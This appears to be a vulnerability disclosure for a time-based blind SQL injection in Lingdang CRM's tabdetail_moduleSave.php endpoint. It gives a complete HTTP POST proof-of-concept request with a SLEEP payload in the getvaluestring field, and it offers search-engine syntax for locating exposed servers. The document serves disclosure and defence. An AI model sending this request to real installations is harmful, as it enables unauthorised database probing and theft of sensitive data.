Affected Version: Lingdang CRM ≤V8.6.4.3
Vendor: Shanghai Lingdang Information Technology www.51mis.com
Software: Lingdang CRM
Vulnerability Files:
/crm/crmapi/erp/tabdetail_moduleSave.phpThere is an SQL injection vulnerability in the system interface tabdetail_moduleSave.php. In the JSON request received by the interface, the getvaluestring field is not effectively parameterized and is directly concatenated into the SQL query statement. Attackers can launch time blind injection attacks by constructing statements such as SELECT IF (1=1, SLEEP (10), 0) to detect database structure and obtain sensitive information. The vulnerability is due to the lack of pre compiled statements and input validation. It is recommended to fix it as soon as possible.
POST /crm/crmapi/erp/tabdetail_moduleSave.php HTTP/1.1 Host: XX.XX.XX.XX Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close Content-Type: application/json Content-Length: 255
{ "module": "Accounts", "datas": { "X": { "accountname": { "crm_fieldvariable": "x.accountname", "getvaluemethod": "SQL", "getvaluestring": "SELECT IF(1=1, SLEEP(10), 0) AND ?", "value": "1" } } } }
When the request is successful, the SQL database "sleeps" for 10 seconds, causing a 10 second delay in page response.
If necessary, I can provide the search syntax of the cyberspace search engine to facilitate the replication of this vulnerability.Looking forward to your reply,thanks.
case1
case2
case3
